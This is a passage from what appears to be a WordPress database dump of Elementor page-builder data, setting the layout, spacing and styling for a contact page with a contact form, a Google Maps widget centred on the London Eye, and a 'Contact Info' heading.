d\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"qmxghdz\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5}},\"elements\":[{\"id\":\"lofqghi\",\"elType\":\"widget\",\"settings\":{\"section_magzma_contact_form_general_control\":\"\",\"form_select\":\"28\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false}],\"isInner\":false}]'),(496,361,'_elementor_version','0.4'),(497,362,'_elementor_template_type','page'),(498,362,'_elementor_edit_mode','builder'),(499,362,'_elementor_data','[{\"id\":\"cojxkpm\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"brnihcq\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"background_overlay_image\":null,\"background_overlay_video_fallback\":null,\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5}},\"elements\":[{\"id\":\"fehojou\",\"elType\":\"widget\",\"settings\":{\"section_map\":\"\",\"address\":\"London Eye, London, United Kingdom\",\"zoom\":{\"unit\":\"px\",\"size\":10},\"height\":{\"unit\":\"px\",\"size\":\"450\"},\"prevent_scroll\":\"yes\",\"view\":\"traditional\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"hlvipbb\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"joibcbi\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"39.982\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"background_overlay_image\":null,\"background_overlay_video_fallback\":null,\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5}},\"elements\":[{\"id\":\"qufhoci\",\"elType\":\"widget\",\"settings\":{\"section_magzma_contact_form_general_control\":\"\",\"form_select\":\"28\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false},{\"id\":\"kueurih\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"60.018\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"background_overlay_image\":null,\"background_overlay_video_fallback\":null,\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5}},\"elements\":[{\"id\":\"kfycsca\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"5\",\"the_title\":\"Contact Info\",\"title_size\":\"h3\",\"typography_title_typography\":\"\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#000000\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e1e1e1\",\"text_bg_color_7\":\"#61c436\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\"